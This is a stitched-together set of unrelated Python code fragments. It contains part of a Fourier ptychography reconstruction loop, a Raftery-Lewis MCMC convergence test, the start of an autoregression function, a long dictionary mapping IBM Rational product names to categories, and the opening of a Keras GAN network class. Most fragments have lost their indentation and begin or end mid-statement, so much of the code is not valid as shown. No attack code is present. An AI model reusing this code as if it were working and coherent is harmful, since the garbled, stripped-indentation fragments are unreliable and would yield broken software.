        HOtO = 0.5 * np.conj(self.pupil) * self.F(np.sqrt(self.frame_list[frame_index, :, :]) * (gl ** 2) / (np.abs(gl) ** 3 + 1e-15) * objcrop_p.conj())
        Hx[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
           self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] += HOO + HOtO
    # Average over all frames and add Levenberg-Marquardt damping.
    Hx = (Hx / float(self.n_frames) + self.options.lm_delta2 * x)
    Hx.shape = (Hx.size, 1)
    return Hx
def run(self, n_iter=None):
"""
This function reconstructs object
max_it is set very high by default so it will be ignored.
"""
# Use max iteration from options or if user supplies
if n_iter is None:
n_iter = self.options.max_it - self.current_itr
if self.current_itr + n_iter > self.options.max_it:
print("Reached max iteration.")
else:
# Compute and print cost
self.cost[0] = self.Afunc(funcVal_only=True, frames_to_process=range(self.n_frames))
# Plot initial
if self.current_itr == 0:
if not self.options.quiet:
if not self.options.live_plot:
print(displaytools.Color.BLUE + "| Iter | Cost | Elapsed time (sec) | Auto-calib norm | " + displaytools.Color.END)
print("|% 5d | %.02e | % 7.2f | % 4.2f |" % (0, self.cost[0], 0., 0.))
else:
self.plotter = FpmPlot(self, figsize = self.options.live_plot_figure_size, figaspect=self.options.live_plot_aspect)
t_start = time.time()
if self.options.algorithm == "seq_nesterov":
objfcrop_hist = np.zeros((self.n_frames, self.m_crop, self.n_crop), dtype="complex128")
for iter in range(n_iter):
if (self.current_itr in self.options.led_auto_calib_itr_range) & self.options.led_auto_calib_enabled:
source_list_na_prev = self.crop2na()
# Store previous objf (for global algorithms)
objf_prev = self.objf
# Switch based on method
if self.options.algorithm == "seq_gerchberg_saxton":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
# Amplitude substitution
objfcrop = self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]]
objfcrop_ampsub = self.F((np.sqrt(self.frame_list[frame_index, :, :]) * np.exp(1j * np.angle(self.iF(objfcrop * self.pupil)))))
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= (objfcrop - objfcrop_ampsub) * self.pupil
elif self.options.algorithm == "seq_gd":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
# Amplitude substitution
# (grad_list, mask_list), fval = self.Afunc(frames_to_process=frame_index)
#
# for index, gradient in enumerate(grad_list):
# self.objf[mask_list[index]] -= self.options.alg_gd_step_size * gradient
gradient, fval = self.Afunc(frames_to_process=frame_index)
# objfcrop = self.objf[self.cropystart[i_img][0]:self.cropyend[i_img][0],
# self.cropxstart[i_img][0]:self.cropxend[i_img][0]]
# gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
# self.objf[self.cropystart[frame_index][0][0]:self.cropyend[frame_index][0][0],
# self.cropxstart[frame_index][0][0]:self.cropxend[frame_index][0][0]] -= self.options.alg_gd_step_size * gradient
self.objf -= self.options.alg_gd_step_size * gradient
elif self.options.algorithm == "seq_nesterov":
for frame_index in range(self.n_frames):
objfcrop = self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]]
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
if self.current_itr == 0:
objfcrop_hist[frame_index:, :] = objfcrop
gradient = self.Afunc(self.objf, idx=frame_index)[0]
gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= self.options.alg_nest_alpha * gradient
else:
objfcrop_d = objfcrop - objfcrop_hist[frame_index, :, :]
objfcrop_hist[frame_index, :, :] = objfcrop
objf_mom = self.objf.copy()
objf_mom[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] = objfcrop + self.options.alg_nest_beta * objfcrop_d
gradient = self.Afunc(objf_mom, idx=frame_index)[0].reshape([self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= (self.options.alg_nest_alpha * gradient - self.options.alg_nest_beta * objfcrop_d)
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
elif self.options.algorithm == "seq_lma_approx":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
gradient = self.Afunc(self.objf, idx=frame_index)[0]
gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
step_size = np.abs(self.pupil) / np.max(np.abs(self.pupil.ravel()))
hinv_approx = 1. / (np.abs(self.pupil) ** 2 + self.options.lm_delta2)
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= step_size * hinv_approx * gradient
elif self.options.algorithm == "seq_lma":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
gradient = self.Afunc(self.objf, idx=frame_index)[0]
step_size = np.abs(self.pupil) / np.max(np.abs(np.reshape(self.pupil, -1)))
curr_hessian = lambda x: self.applyHessianSeq(x, frame_index, self.objf)
descent_dir = algorithms.cg(curr_hessian, -gradient, maxIter=50)[0]
descent_dir = np.reshape(descent_dir, [self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] += 0.5 * step_size * descent_dir
elif self.options.algorithm == "global_gd":
if self.current_itr > 0: # Running this during the first iteration doesn't make sense
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
source_list_na_prev = np.asarray(self.crop2na())
self.findLedNaError(leds_to_process=-1)
if self.options.led_auto_calib_rigid_trans:
self.fitLedNaToRigidTransform()
self.source_list_na = np.asarray(self.crop2na())
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - source_list_na_prev))
if self.options.led_auto_calib_add_error_na > 0.0:
print("Auto-calibration error is: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_design))
(grad_list, mask), fval = self.Afunc(frames_to_process=range(self.n_frames))
for gradient_index, gradient in enumerate(grad_list):
self.objf[mask[gradient_index, :, :]] += self.options.alg_gd_step_size * gradient
elif self.options.algorithm == "global_nesterov":
objf_d = self.objf - objf_prev
objf_prev = self.objf.copy()
gradient = self.Afunc((self.objf + self.options.alg_nest_beta * objf_d))[0]
gradient = np.reshape(gradient, [self.M, self.N])
self.objf -= (self.options.alg_nest_alpha * gradient - self.options.alg_nest_beta * objf_d)
self.obj[self.current_itr + 1, :, :] = self.iF(self.objf) * (self.scale ** 2)
self.cost[self.current_itr + 1] = self.Afunc(self.objf, funcVal_only=True)
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
print("Performing Auto-calibration")
source_list_na_prev = self.crop2na()
self.findLedNaError(leds_to_process=-1)
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_prev))
elif self.options.algorithm == "global_lbfgs":
raise NotImplementedError("lbfgs needs to be modified to work with single-class model.")
# self.frame_list_it = 0
#
# def compute_l_bfgs_cost(x):
#
# # LED Auto-calibration
# if self.options.led_auto_calib_enabled:
# if self.current_itr in self.options.led_auto_calib_itr_range:
# print("Performing Auto-calibration")
# source_list_na_prev = self.crop2na()
# self.findLedNaError(leds_to_process=-1)
# print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na_up - self.source_list_na_prev))
#
# self.frame_list_it += 1
# self.cost[self.frame_list_it] = self.Afunc(x, funcVal_only=True)
# self.objf = np.reshape(x, [self.M, self.N]).copy()
# self.obj[self.frame_list_it, :, :] = self.iF(self.objf) * (self.scale ** 2)
# print("| %02d | %.02e | %.02f |" % (self.frame_list_it, self.cost[self.frame_list_it], time.time() - t_start))
# x0 = self.objf.ravel()
# x, f, d = algorithms.lbfgs(self.Afunc, x0, iprint=1, maxiter=self.maxit-1, disp=1, callback=compute_l_bfgs_cost)
# iter = np.minimum(d["nit"], self.maxit)
# self.cost = self.cost[0:iter + 1]
# self.obj = self.obj[:iter + 1, :, :]
elif self.options.algorithm == "global_newton":
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
print("Performing Auto-calibration")
source_list_na_prev = self.crop2na()
if self.options.led_auto_calib_rigid_trans:
self.findLedNaError(leds_to_process=-1)
self.fitLedNaToRigidTransform()
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_prev))
gradient, fval = self.Afunc(self.objf)
descent_dir, info = algorithms.cgs(self.applyHessianGlobal, -gradient, maxiter=100, tol=1e-8)
descent_dir = descent_dir.ravel()
x0 = self.objf.ravel()
x, step_size = algorithms._linesearch(self.Afunc, x0, descent_dir, gradient, t=0.05,
stepSize0=200, gamma=0.8, funcVal_last=fval)[0:2]
self.objf = np.reshape(x, [self.M, self.N]).copy()
| |
1]. The level of accuracy in the quantile estimate.
Default is 0.005.
s : float, optional
A float in [0, 1]. The probability of attaining accuracy ``r`` of the
quantile ``q``. Default is 0.95.
axis : int
The axis along which to compute the test. Default is 0, it is computed
for all other axes simultaneously along axis 0.
References
----------
Raftery, A. E. and Lewis, S. M. (1992). "How Many Iterations in the
Gibbs Sampler?" In Bayesian Statistics, Vol. 4 (J. M. Bernardo, J. O.
Berger, A. P. Dawid and A. F. M. Smith, eds.). Oxford, U.K.: Oxford
University Press, 763-773.
Raftery, A. E. and Lewis, S. M. (1995). "The Number of Iterations,
Convergence Diagnostics and Generic Metropolis Algorithms." In Practical
Markov Chain Monte Carlo (W. R. Gilks, S. Richardson and D. J.
Spiegelhalter, eds.). London, U.K.: Chapman and Hall.
Raftery, A. E. and Lewis, S. M. (1995). "Gibbsit", version 2.0.
URL: http://lib.stat.cmu.edu/general/gibbsit. Visited: 2017-08-18.
Examples
--------
>>> import parsimony.utils.mcmc as mcmc
>>> import numpy as np
>>> np.random.seed(1)
>>>
>>> N = 4000
>>> X = np.cumprod(np.r_[[1.0], 1.0 + np.random.randn(N) / (100 + np.arange(N)**1.1)])
>>> # import matplotlib.pyplot as plt; plt.figure(); plt.plot(X); plt.show()
>>> test = mcmc.RafteryLewis()
>>> # passed, stats = test(X)
>>> # passed
"""
def __init__(self, q=0.025, r=0.005, s=0.95, eps=0.001, test_threshold=5.0,
             axis=0):
    """Initialize the diagnostic, sanitizing every parameter.

    The probability-like parameters (q, r, s) are clamped to [0, 1]; eps
    is bounded below by consts.TOLERANCE and the threshold by 1.0.
    """
    super(RafteryLewis, self).__init__(discard_prop=0.0)

    def clamp_unit(value):
        # Force a probability-like value into the closed interval [0, 1].
        return max(0.0, min(float(value), 1.0))

    self.q = clamp_unit(q)
    self.r = clamp_unit(r)
    self.s = clamp_unit(s)
    self.eps = max(consts.TOLERANCE, float(eps))
    self.test_threshold = max(1.0, float(test_threshold))
    self.axis = int(axis)
def test(self, X):
    """Performs the test and computes test statistics.

    Arguments
    ---------
    X : numpy.array
        The data to test. One of the dimensions (``axis``) corresponds to
        the samples from a Markov chain, and the other dimensions
        represents different chains (e.g. separate chains and/or different
        parameters).

    Returns
    -------
    test_result : bool
        Whether the test says the chain has converged or not. For multiple
        parameters, returns True only if the chains have all converged.
    statistics : dict
        Test statistics. A dict with numpy arrays will be returned where
        each element of the array corresponds to the statistics for each
        different chain. If one-dimensional, the test statistics will be
        returned directly in the dict.
    """
    N = X.shape[self.axis]

    # Two-sided standard-normal quantile for the requested probability s.
    phi = stat.norm.ppf(0.5 * (1.0 + self.s))

    # Minimum number of samples required to estimate the q-quantile to
    # accuracy r with probability s (Raftery & Lewis, 1992).
    N_min = int(np.ceil(self.q * (1.0 - self.q) * (phi / self.r)**2) + 0.5)
    if N_min > N:
        raise ValueError("Too few samples (%d = N_min > N = %d). The "
                         "model can not be computed." % (N_min, N))

    # Bug fix: self.q is a probability in [0, 1], while numpy.percentile
    # expects a percentage in [0, 100].
    qhat = np.percentile(X, 100.0 * self.q, axis=self.axis)

    # Indicator chain Z: 1 where X <= qhat, broadcast along the sample axis.
    axes = list(range(X.ndim))
    axes[0] = self.axis
    axes[self.axis] = 0
    Z = np.transpose(np.transpose(X, axes=axes) <= qhat,
                     axes=axes).astype(int)

    # Find the smallest thinning k at which the thinned indicator chain is
    # adequately described by a first-order Markov model (BIC < 0).
    k = 0
    BIC = 1.0
    chain_ind = np.arange(qhat.size)
    dim = [slice(None)] * X.ndim
    # Bug fix: the original condition was `np.any(BIC) >= 0.0`, which
    # compares a bool to 0.0 and is therefore always True, so the loop
    # could only terminate through the ValueError below.
    while np.any(BIC >= 0.0):
        k = k + 1
        dim[self.axis] = slice(0, N, k)
        # Index with a tuple of slices; a list of slices is invalid in
        # modern numpy.
        test_chain = Z[tuple(dim)]
        test_N = test_chain.shape[self.axis]
        if test_N < 3:
            raise ValueError("Too few samples. The model can not be "
                             "computed.")

        # Second-order transition counts. Bug fix: these must be computed
        # on the *thinned* chain; the original counted on the full chain,
        # so the statistic never changed with k and the loop could not
        # converge.
        dim0 = [slice(None)] * Z.ndim
        dim0[self.axis] = slice(0, test_N - 2)
        dim1 = [slice(None)] * Z.ndim
        dim1[self.axis] = slice(1, test_N - 1)
        dim2 = [slice(None)] * Z.ndim
        dim2[self.axis] = slice(2, test_N - 0)
        temp = test_chain[tuple(dim0)] \
            + 2 * test_chain[tuple(dim1)] \
            + 4 * test_chain[tuple(dim2)]

        P3 = np.zeros((chain_ind.size, 2, 2, 2))  # Transition counts.
        i = 0
        for i1 in range(2):
            for i2 in range(2):
                for i3 in range(2):
                    P3[:, i1, i2, i3] = np.sum(temp == i,
                                               axis=self.axis).ravel()
                    i += 1

        # G2 log-likelihood-ratio statistic for first- versus second-order
        # Markov dependence; cells with zero count are skipped.
        g2 = 0.0
        for i1 in range(2):
            for i2 in range(2):
                for i3 in range(2):
                    if np.any(P3[:, i1, i2, i3] > 0):
                        fitted = np.divide((P3[:, i1, i2, 0] + P3[:, i1, i2, 1])
                                           * (P3[:, 0, i2, i3] + P3[:, 1, i2, i3]),
                                           (P3[:, 0, i2, 0]
                                            + P3[:, 0, i2, 1]
                                            + P3[:, 1, i2, 0]
                                            + P3[:, 1, i2, 1]))
                        focus = P3[:, i1, i2, i3]
                        g2 += np.multiply(np.log(np.divide(focus, fitted)),
                                          focus)
        g2 *= 2.0
        BIC = g2 - np.log(test_N - 2) * 2.0

    # First-order transition counts of the thinned chain:
    # alpha = P(0 -> 1), beta = P(1 -> 0). Computed on the thinned chain
    # because the burn-in m and sample count n estimated from them are
    # scaled back to raw samples by k below.
    P2 = np.zeros((chain_ind.size, 2, 2))
    dimZ = [slice(None)] * Z.ndim
    for i in range(1, test_N):
        dimZ[self.axis] = i - 1
        i0 = test_chain[tuple(dimZ)].ravel()
        dimZ[self.axis] = i - 0
        i1 = test_chain[tuple(dimZ)].ravel()

        P2[chain_ind, i0, i1] += 1

    alpha = np.divide(P2[:, 0, 1], P2[:, 0, 0] + P2[:, 0, 1])
    beta = np.divide(P2[:, 1, 0], P2[:, 1, 0] + P2[:, 1, 1])
    alpha = alpha.reshape(qhat.shape)
    beta = beta.reshape(qhat.shape)
    alpha_beta = alpha + beta

    # Burn-in length in thinned steps, scaled back to raw samples by k.
    m = np.divide(np.log(np.divide(self.eps * alpha_beta,
                                   np.maximum(alpha, beta))),
                  np.log(np.absolute(1.0 - alpha_beta)))
    m = (np.ceil(m) + 0.5).astype(int)
    M = m * k

    # Required post-burn-in samples (thinned), scaled back by k.
    n = np.divide(np.multiply(np.multiply(alpha, beta), 2.0 - alpha_beta),
                  alpha_beta**3.0) / ((self.r / phi)**2.0)
    n = (np.ceil(n) + 0.5).astype(int)
    N = n * k

    I = (M + N) / N_min  # Dependence factor.

    passed = I < self.test_threshold

    statistics = {"tests_passed": passed,  # If the chains have converged.
                  "I": I,  # Test statistic, the dependence factor.
                  "k": k,  # Thinning
                  "M": M,  # Burn-in
                  "N": N,  # Number of required samples after burn-in.
                  "N_min": N_min}  # The minimum required number of samples

    return np.all(passed), statistics
def autoregression(X, p=2, lag=1, axis=0, unbiased=True, mean=True):
"""Computes the autoregression coefficients, AR(p), from time-series data.
Arguments
---------
X : numpy.array
The time-series to compute the autoregression coefficients for. The
number of elements along the given axis should be at least ten, for the
results to be meaningful, and greater than ``p`` for the model to be
computed at all.
p : int
Positive int. The order of the autoregression model, i.e. the number of
coefficients to return. Default is 2.
lag : int
Positive int. The time lag to use. Default is 1.
axis : int
The axis along which to compute the autoregression coefficients.
Default is 0, it is computed for all other axes simultaneously along
axis 0.
unbiased : bool
Whether to compute an unbiased model, or a biased one. The unbiased
model may be sensitive to noise. Default is True, compute the unbiased
model.
mean : bool
Whether to subtract the mean of the time-series or not. Default is
True, subtract the mean.
Returns
-------
phi : numpy.array
The autoregression coefficients, computed along ``axis``.
sigma2 : float
The variance of the noise in the time-series, computed along ``axis``.
References
----------
<NAME>. "The Yule Walker Equations for the AR Coefficients".
Technical report. Retrieved August 8, 2017, from:
http://www-stat.wharton.upenn.edu/~steele/Courses/956/ResourceDetails/YWSourceFiles/YW-Eshel.pdf
Wikipedia contributors (2017), "Autoregressive model". Wikipedia: The Free
Encyclopedia. Wikimedia Foundation, Inc. Retrieved August 8, 2017, from:
https://en.wikipedia.org/wiki/Autoregressive_model.
Wikipedia contributors (2017), "Autocorrelation". Wikipedia: The Free
Encyclopedia. Wikimedia Foundation, Inc. Retrieved August 8, 2017, from:
https://en.wikipedia.org/wiki/Autocorrelation.
"""
axis = int(axis)
if (axis < -X.ndim) or (axis >= X.ndim):
raise ValueError("The provided axis is not present.")
N = X.shape[axis]
if N <= p:
raise ValueError("Too few samples. The model can not be computed.")
if N < 10:
import warnings
warnings.warn("Too few samples for the model to be meaningful "
"(N < 10).")
p = max(1, min(int(p), N))
lag = max(1, min(int(lag), N - 1)) - 1 # Zero-based, so smallest is zero
unbiased = bool(unbiased)
mean = bool(mean)
if mean:
mu = np.mean(X, | |
ada embedded developer enterprise edition': ['rational ada'],
'rational apex': ['rational'],
'rational application': ['rational'],
'rational application developer': ['rational application'],
'rational application developer for websphere': ['rational application'],
'rational application developer for websphere software': [ 'rational '
'application'],
'rational asset': ['rational'],
'rational asset analyzer': ['rational asset'],
'rational asset analyzer for system': ['rational asset'],
'rational asset analyzer for system z': ['rational asset'],
'rational asset manager': ['rational asset'],
'rational automation': ['rational'],
'rational automation framework': ['rational automation'],
'rational automation framework for websphere': ['rational automation'],
'rational build': ['rational'],
'rational build forge': ['rational build'],
'rational build forge family': ['rational build'],
'rational business developer': ['rational'],
'rational change': ['rational'],
'rational clearcase': ['rational'],
'rational clearcase change': ['rational clearcase'],
'rational clearcase change management solution enterprise edition': [ 'rational '
'clearcase'],
'rational clearcase lt': ['rational clearcase'],
'rational clearcase multisite': ['rational clearcase'],
'rational clearddts': ['rational'],
'rational clearquest': ['rational'],
'rational clearquest and functional': ['rational clearquest'],
'rational clearquest and functional testing': ['rational clearquest'],
'rational clearquest multisite': ['rational clearquest'],
'rational cobol': ['rational'],
'rational cobol generation': ['rational cobol'],
'rational cobol generation extension': ['rational cobol'],
'rational cobol generation extension for zseries': ['rational cobol'],
'rational cobol runtime': ['rational cobol'],
'rational cobol runtime for zseries': ['rational cobol'],
'rational computer': ['rational'],
'rational computer based': ['rational computer'],
'rational computer based training': ['rational computer'],
'rational dashboard': ['rational'],
'rational data': ['rational'],
'rational data and application': ['rational data'],
'rational data and application modeling': ['rational data'],
'rational data and application modeling bundle': ['rational data'],
'rational developer': ['rational'],
'rational developer for i for soa construction': ['rational developer'],
'rational developer for power systems software': ['rational developer'],
'rational developer for system': ['rational developer'],
'rational developer for system z': ['rational developer'],
'rational development': ['rational'],
'rational development and test': ['rational development'],
'rational development and test environment for system z': [ 'rational '
'development'],
'rational development studio': ['rational development'],
'rational development studio for i': ['rational development'],
'rational doors': ['rational'],
'rational doors analyst': ['rational doors'],
'rational doors analyst add': ['rational doors'],
'rational doors web': ['rational doors'],
'rational doors web access': ['rational doors'],
'rational elite': ['rational'],
'rational elite support': ['rational elite'],
'rational elite support for eclipse': ['rational elite'],
'rational elite support for mainsoft': ['rational elite'],
'rational elite support for mainsoft document collaboration for rational jazz': [ 'rational '
'elite'],
'rational engineering': ['rational'],
'rational engineering lifecycle': ['rational engineering'],
'rational engineering lifecycle manager': ['rational engineering'],
'rational focal point': ['rational'],
'rational functional': ['rational'],
'rational functional tester': ['rational functional'],
'rational functional tester plus': ['rational functional'],
'rational host': ['rational'],
'rational host access': ['rational host'],
'rational host access transformation': ['rational host'],
'rational host access transformation services': ['rational host'],
'rational host integration': ['rational host'],
'rational host integration solution': ['rational host'],
'rational host on-demand': ['rational host'],
'rational insight': ['rational'],
'rational lifecycle': ['rational'],
'rational lifecycle integration': ['rational lifecycle'],
'rational lifecycle integration adapters': ['rational lifecycle'],
'rational lifecycle package': ['rational lifecycle'],
'rational lifecycle package with clearcase': ['rational lifecycle'],
'rational logiscope': ['rational'],
'rational manual tester': ['rational'],
'rational method composer': ['rational'],
'rational modeling': ['rational'],
'rational modeling extension': ['rational modeling'],
'rational modeling extension for microsoft': ['rational modeling'],
'rational modeling extension for microsoft .net': ['rational modeling'],
'rational open': ['rational'],
'rational open access': ['rational open'],
'rational open access rpg': ['rational open'],
'rational open access rpg edition': ['rational open'],
'rational performance': ['rational'],
'rational performance test': ['rational performance'],
'rational performance test server': ['rational performance'],
'rational performance tester': ['rational performance'],
'rational policy': ['rational'],
'rational policy tester': ['rational policy'],
'rational policy tester family': ['rational policy'],
'rational portfolio manager': ['rational'],
'rational professional bundle': ['rational'],
'rational programming patterns': ['rational'],
'rational project conductor': ['rational'],
'rational projectconsole': ['rational'],
'rational publishing engine': ['rational'],
'rational purify': ['rational'],
'rational purify family': ['rational purify'],
'rational purify for linux': ['rational purify'],
'rational purify for linux and unix': ['rational purify'],
'rational purify for windows': ['rational purify'],
'rational purifyplus': ['rational'],
'rational purifyplus enterprise': ['rational purifyplus'],
'rational purifyplus enterprise edition': ['rational purifyplus'],
'rational purifyplus family': ['rational purifyplus'],
'rational purifyplus for linux': ['rational purifyplus'],
'rational purifyplus for linux and unix': ['rational purifyplus'],
'rational purifyplus for windows': ['rational purifyplus'],
'rational quality': ['rational'],
'rational quality manager': ['rational quality'],
'rational quality manager family': ['rational quality'],
'rational quality manager standard': ['rational quality'],
'rational quality manager standard edition': ['rational quality'],
'rational requirements composer': ['rational'],
'rational requisitepro': ['rational'],
'rational rhapsody family': ['rational'],
'rational robot': ['rational'],
'rational rose': ['rational'],
'rational rose data': ['rational rose'],
'rational rose data modeler': ['rational rose'],
'rational rose developer': ['rational rose'],
'rational rose developer for java': ['rational rose'],
'rational rose developer for unix': ['rational rose'],
'rational rose developer for visual studio': ['rational rose'],
'rational rose enterprise': ['rational rose'],
'rational rose family': ['rational rose'],
'rational rose modeler': ['rational rose'],
'rational rose technical': ['rational rose'],
'rational rose technical developer': ['rational rose'],
'rational sdl suite': ['rational'],
'rational service': ['rational'],
'rational service tester': ['rational service'],
'rational service tester for soa': ['rational service'],
'rational service tester for soa quality': ['rational service'],
'rational soda': ['rational'],
'rational software': ['rational'],
'rational software analyzer': ['rational software'],
'rational software analyzer developer': ['rational software'],
'rational software analyzer developer edition': ['rational software'],
'rational software analyzer enterprise': ['rational software'],
'rational software analyzer enterprise edition': ['rational software'],
'rational software analyzer family': ['rational software'],
'rational software architect': ['rational software'],
'rational software architect design': ['rational software'],
'rational software architect design manager': ['rational software'],
'rational software architect for websphere': ['rational software'],
'rational software architect for websphere software': ['rational software'],
'rational software architect realtime': ['rational software'],
'rational software architect realtime edition': ['rational software'],
'rational software architect standard': ['rational software'],
'rational software architect standard edition': ['rational software'],
'rational software modeler': ['rational software'],
'rational statemate': ['rational'],
'rational suite': ['rational'],
'rational suite developmentstudio': ['rational suite'],
'rational suite developmentstudio for unix': ['rational suite'],
'rational suite for technical': ['rational suite'],
'rational suite for technical developers': ['rational suite'],
'rational synergy': ['rational'],
'rational system': ['rational'],
'rational system architect': ['rational system'],
'rational system architect xt': ['rational system'],
'rational systems': ['rational'],
'rational systems developer': ['rational systems'],
'rational systems tester': ['rational systems'],
'rational tau': ['rational'],
'rational team': ['rational'],
'rational team concert': ['rational team'],
'rational team concert express': ['rational team'],
'rational team concert express-c': ['rational team'],
'rational team concert for i': ['rational team'],
'rational team concert for i express': ['rational team'],
'rational team concert for i express edition': ['rational team'],
'rational team concert for i standard': ['rational team'],
'rational team concert for i standard edition': ['rational team'],
'rational team concert for power': ['rational team'],
'rational team concert for power systems': ['rational team'],
'rational team concert for power systems software': ['rational team'],
'rational team concert for system': ['rational team'],
'rational team concert for system z': ['rational team'],
'rational team concert standard': ['rational team'],
'rational team unifying': ['rational team'],
'rational team unifying platform': ['rational team'],
'rational team webtop': ['rational team'],
'rational test': ['rational'],
'rational test realtime': ['rational test'],
'rational test virtualization': ['rational test'],
'rational test virtualization server': ['rational test'],
'rational test workbench': ['rational test'],
'rational testmanager': ['rational'],
'rational transformation workbench': ['rational'],
'rational ttcn suite': ['rational'],
'rational visual test': ['rational'],
'rational web': ['rational'],
'rational web developer': ['rational web'],
'rational web developer for websphere': ['rational web'],
'rational web developer for websphere software': ['rational web'],
'raytheon': ['company'],
'rdf': ['programming language'],
'rdfs': ['programming language'],
'rds': ['database'],
'reactjs': ['javascript'],
'readable medium': ['medium'],
'real time operating system': ['operating system'],
'realistic': ['state'],
'reasonable prices': ['customer oriented'],
'reciprocal averaging': ['linear dimension reduction model'],
'recognition': ['activity'],
'recommendation systems': ['machine learning'],
'recovery': ['activity'],
'recruiter': ['individual role'],
'recruiting': ['activity'],
'recruiting document': ['document'],
'recruiting role': ['individual role'],
'recruitment strategy': ['individual role'],
'recruitment system': ['document'],
'recurrent neural networks': ['nueral networks'],
'red hat': ['cloud skill'],
'red hat architect': ['cloud architect'],
'red hat commercial databases modernization': [ 'red hat databases '
'modernization'],
'red hat commercial middleware': ['red hat'],
'red hat commercial middleware modernization': [ 'red hat middleware '
'modernization'],
'red hat databases modernization': ['databases modernization'],
'red hat developer': ['cloud developer'],
'red hat devops': ['virtualization infrastructure'],
'red hat jboss': ['redhat virtualization'],
'red hat microsoft apps modernization': ['apps modernization'],
'red hat middleware architect': ['red hat architect'],
'red hat middleware modernization': ['middleware modernization'],
'red hat open source': ['red hat'],
'red hat open source databases modernization': [ 'red hat databases '
| |
from Network.component import Component
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow import keras
from Network.component import PerceptionRemovalModelComponent, BidirectionalRemovalComponent, \
MisalignedRemovalComponent, BeyondLinearityComponent, InfoGComponent, EncoderDecoderRemovalComponent
class Network:
"""
This class implements nn models' architecture for the Reflection-Enhancement-gan
@Author: <NAME>
@Date: 2020.11.05
"""
@staticmethod
def build_modal_encoder(img_size=256, code_dim=32):
    """
    Reflection modal encoder: encodes a stacked [r, rb] image pair
    (3 + 3 channels) into a low-dimensional latent code.

    :param img_size: spatial size of the (square) input images
    :param code_dim: dimensionality of the latent code produced
    :return: tf.keras.Model mapping the stacked input to the code
    """
    stacked_input = keras.layers.Input(shape=(img_size, img_size, 3 + 3))

    # Six downsampling stages (each conv block presumably halves the
    # spatial resolution -- see Component.get_conv_block). Only the first
    # stage disables normalization; the rest use the block's default.
    stage_specs = [
        (3 + 3, 32, {"norm": False}),
        (32, 64, {}),
        (64, 128, {}),
        (128, 256, {}),
        (256, 256, {}),
        (256, 4, {}),
    ]
    features = stacked_input
    for in_ch, out_ch, extra_kwargs in stage_specs:
        features = Component.get_conv_block(in_ch, out_ch, **extra_kwargs)(features)

    # Flatten the deepest feature map and project it to the latent code.
    latent = layers.Dense(code_dim)(layers.Flatten()(features))
    return keras.Model(stacked_input, latent)
@staticmethod
def build_modal_decoder(img_size=256):
"""
reflection modal decoder, which accepts [code_dim, ]
:param img_size:
:return:
"""
pass
@staticmethod
def build_simple_G(img_size=256, noise_dim=1):
"""
build a simple generator for the regan.
:param img_size:
:return:
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + noise_dim))
